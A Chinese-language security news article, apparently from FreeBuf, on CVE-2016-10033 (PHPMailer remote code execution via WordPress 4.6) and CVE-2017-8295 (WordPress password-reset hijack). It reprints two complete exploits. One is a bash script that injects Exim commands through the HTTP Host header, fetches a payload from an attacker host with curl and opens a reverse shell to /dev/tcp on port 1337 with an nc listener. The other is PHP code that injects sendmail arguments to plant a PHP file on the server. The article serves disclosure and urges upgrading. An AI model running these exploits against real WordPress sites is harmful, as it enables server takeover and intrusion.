【2017.5.4更新】
昨天曝出了两个比较热门的漏洞,一个是CVE-2016-10033,另一个则为CVE-2017-8295。从描述来看,前者是WordPress Core 4.6一个未经授权的RCE漏洞。不过实际上,这就是去年12月份FreeBuf已经报道的漏洞,因此我们在原文基础上进行更新。
这次漏洞公告就是PHPMailer漏洞利用细节在WordPress核心中的实现。未经授权的攻击者利用漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落。无需插件或者非标准设置,就能利用该漏洞。实际上Wordfence当时就曾经提到过该漏洞影响到了WP Core。
最新的这则公告提到了PHP mail()函数的新利用向量,可在MTA – Exim4之上利用该漏洞,Exim在如Debian或Ubuntu等系统中都是默认安装的。这样一来也就增加了此类攻击的范围和漏洞的严重性。具体为利用host字段注入了恶意数据,进入到了mail函数,再利用sendmail (实际上是软连接到的exim4)命令的-be 参数来执行命令。
之所以到现在才公布这部分细节,是期望给予WordPress和其它收到影响的软件提供商更多时间来升级受影响的Mail库。除此之外,也是针对CVE-2017-8295漏洞留出更多的修复时间。
漏洞利用详情参见:https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
影响范围:
本次公告中提到的RCE PoC基于WordPress 4.6实现,不过其它版本的WordPress也可能受到影响。
视频演示PoC:https://www.youtube.com/watch?v=ZFt_S5pQPX0
作者给出的PoC:
1 #!/bin/bashView Code
2 #
3
4 # __ __ __ __ __
5
6 # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
7
8 # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
9
10 # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
11
12 # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
13
14 # /____/
15
16 #
17
18 #
19
20 # WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
21
22 # CVE-2016-10033
23
24 #
25
26 # wordpress-rce-exploit.sh (ver. 1.0)
27
28 #
29
30 #
31
32 # Discovered and coded by
33
34 #
35
36 # Dawid Golunski (@dawid_golunski)
37
38 # https://legalhackers.com
39
40 #
41
42 # ExploitBox project:
43
44 # https://ExploitBox.io
45
46 #
47
48 # Full advisory URL:
49
50 # https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
51
52 #
53
54 # Exploit src URL:
55
56 # https://exploitbox.io/exploit/wordpress-rce-exploit.sh
57
58 #
59
60 #
61
62 # Tested on WordPress 4.6:
63
64 # https://github.com/WordPress/WordPress/archive/4.6.zip
65
66 #
67
68 # Usage:
69
70 # ./wordpress-rce-exploit.sh target-wordpress-url
71
72 #
73
74 #
75
76 # Disclaimer:
77
78 # For testing purposes only
79
80 #
81
82 #
83
84 # -----------------------------------------------------------------
85
86 #
87
88 # Interested in vulns/exploitation?
89
90 #
91
92 #
93
94 # .;lc'
95
96 # .,cdkkOOOko;.
97
98 # .,lxxkkkkOOOO000Ol'
99
100 # .':oxxxxxkkkkOOOO0000KK0x:'
101
102 # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
103
104 # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
105
106 # '';ldxxxxxdc,. ,oOXXXNNNXd;,.
107
108 # .ddc;,,:c;. ,c: .cxxc:;:ox:
109
110 # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
111
112 # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
113
114 # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
115
116 # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
117
118 # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
119
120 # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
121
122 # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
123
124 # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
125
126 # .dxxxxxdl;. ., .. .;cdxxxxxx:
127
128 # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
129
130 # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
131
132 # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
133
134 # .':oxxxxxxxxx.ckkkkkkkkxl,.
135
136 # .,cdxxxxx.ckkkkkxc.
137
138 # .':odx.ckxl,.
139
140 # .,.'.
141
142 #
143
144 # https://ExploitBox.io
145
146 #
147
148 # https://twitter.com/Exploit_Box
149
150 #
151
152 # -----------------------------------------------------------------
153
154 rev_host="192.168.57.1"
155
156 function prep_host_header() {
157
158 cmd="$1"
159
160 rce_cmd="\${run{$cmd}}";
161
162 # replace / with ${substr{0}{1}{$spool_directory}}
163
164 #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
165
166 rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
167
168 # replace ' ' (space) with
169
170 #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
171
172 rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
173
174 #return "target(any -froot@localhost -be $rce_cmd null)"
175
176 host_header="target(any -froot@localhost -be $rce_cmd null)"
177
178 return 0
179
180 }
181
182 #cat exploitbox.ans
183
184 intro="
185
186 DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
187
188 bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
189
190 G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
191
192 G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
193
194 IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
195
196 IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
197
198 X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
199
200 b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
201
202 NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
203
204 TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
205
206 QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
207
208 NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
209
210 G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
211
212 eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
213
214 WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
215
216 TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
217
218 ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
219
220 MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
221
222 G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
223
224 WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
225
226 NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
227
228 MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
229
230 X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
231
232 bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
233
234 intro2="
235
236 ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
237
238 fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
239
240 MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
241
242 ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
243
244 aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
245
246 fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
247
248 ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
249
250 bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
251
252 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
253
254 ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
255
256 bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
257
258 cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
259
260 echo "$intro" | base64 -d
261
262 echo "$intro2" | base64 -d
263
264 if [ "$#" -ne 1 ]; then
265
266 echo -e "Usage:\n$0 target-wordpress-url\n"
267
268 exit 1
269
270 fi
271
272 target="$1"
273
274 echo -ne "\e[91m[*]\033[0m"
275
276 read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
277
278 echo
279
280 if [ "$choice" == "y" ]; then
281
282 echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
283
284 echo -e "\e[92m[+]\033[0m Connected to the target"
285
286 # Serve payload/bash script on :80
287
288 RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
289
290 echo "$RCE_exec_cmd" > rce.txt
291
292 python -mSimpleHTTPServer 80 2>/dev/null >&2 &
293
294 hpid=$!
295
296 # Save payload on the target in /tmp/rce
297
298 cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
299
300 prep_host_header "$cmd"
301
302 curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
303
304 echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
305
306 # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
307
308 cmd="/bin/bash /tmp/rce"
309
310 prep_host_header "$cmd"
311
312 curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
313
314 echo -e "\n\e[92m[+]\033[0m Payload executed!"
315
316 echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
317
318 nc -vv -l 1337
319
320 echo
321
322 else
323
324 echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
325
326 exit 0
327
328 fi
329
330 echo "Exiting..."
331
332 exit 0
333
334
上述另外一个最新曝出编号为CVE-2017-8295的漏洞,严重程度被评级为介于Medium和High之间(而非Critical),影响到WordPress Core <= 4.7.4以下的版本。
这个漏洞的概况是这样的:WordPress有个密码重置功能,该特性中存在漏洞——在某些情况下可能导致攻击者在无需身份认证的情况下拿到密码重置链接,这样一来攻击者就能获取目标用户的WordPress账户了。
这个漏洞源于WordPress默认在创建密码重置邮件的时候,采用不受信任的数据。具体的利用方式点击这里查看。目前WordPress官方暂无针对该问题的解决方案,可以采用如下临时解决方案:
用户可启用UserCanonicalName实施静态SERVER_NAME值
https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
据作者所说,该问题已经向WordPress安全团队进行过多次反馈,最早一次是在去年7月份,但一直没有得到相应的反馈。
【2016.12.27原文】
这次曝出远程代码执行漏洞的是堪称全球最流行邮件发送类的PHPMailer,据说其全球范围内的用户量大约有900万——每天还在持续增多。
GitHub上面形容PHPMailer“可能是全球PHP发送邮件最流行的代码。亦被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等”。所以这个漏洞影响范围还是比较广的,漏洞级别也为Critical*。
漏洞编码
CVE-2016-10033
影响版本
PHPMailer < 5.2.18
漏洞级别
高危
漏洞描述
独立研究人员Dawid Golunski发现了该漏洞——远程攻击者利用该漏洞,可实现远程任意代码在web服务器账户环境中执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反馈表单,注册表单,邮件密码重置表单等使用邮件发送的组件时利用此漏洞。
不过有关该漏洞的细节信息,研究人员并未披露,期望给予网站管理员更多的时间来升级PHPMailer类,避免受漏洞影响。
漏洞PoC
实际上Dawid Golunski已经做了个可行的RCE PoC,不过会迟一些再发布。关注视频PoC请点击:https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
更新:PoC代码已经公布,请站长们尽快升级!
1 <?phpView Code
2 /*
3 PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
4 A simple PoC (working on Sendmail MTA)
5 It will inject the following parameters to sendmail command:
6 Arg no. 0 == [/usr/sbin/sendmail]
7 Arg no. 1 == [-t]
8 Arg no. 2 == [-i]
9 Arg no. 3 == [-fattacker\]
10 Arg no. 4 == [-oQ/tmp/]
11 Arg no. 5 == [-X/var/www/cache/phpcode.php]
12 Arg no. 6 == [some"@email.com]
13 which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
14 The resulting file will contain the payload passed in the body of the msg:
15 09607 <<< --b1_cb4566aa51be9f090d9419163e492306
16 09607 <<< Content-Type: text/html; charset=us-ascii
17 09607 <<<
18 09607 <<< <?php phpinfo(); ?>
19 09607 <<<
20 09607 <<<
21 09607 <<<
22 09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
23 See the full advisory URL for details.
24 */
25 // Attacker's input coming from untrusted source such as $_GET , $_POST etc.
26 // For example from a Contact form
27 $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';
28 $msg_body = "<?php phpinfo(); ?>";
29 // ------------------
30 // mail() param injection via the vulnerability in PHPMailer
31 require_once('class.phpmailer.php');
32 $mail = new PHPMailer(); // defaults to using php "mail()"
33 $mail->SetFrom($email_from, 'Client Name');
34 $address = "customer_feedback@company-X.com";
35 $mail->AddAddress($address, "Some User");
36 $mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
37 $mail->MsgHTML($msg_body);
38 if(!$mail->Send()) {
39 echo "Mailer Error: " . $mail->ErrorInfo;
40 } else {
41 echo "Message sent!\n";
42 }
漏洞修复
更新到5.2.18:https://github.com/PHPMailer/PHPMailer
漏洞详情目前已经提交给了PHPMailer官方——官方也已经发布了PHPMailer 5.2.18紧急安全修复,解决上述问题,受影响的用户应当立即升级。详情可参见:
https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md
https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md
*本文投稿作者:lmj,转载须注明来自FreeBuf.COM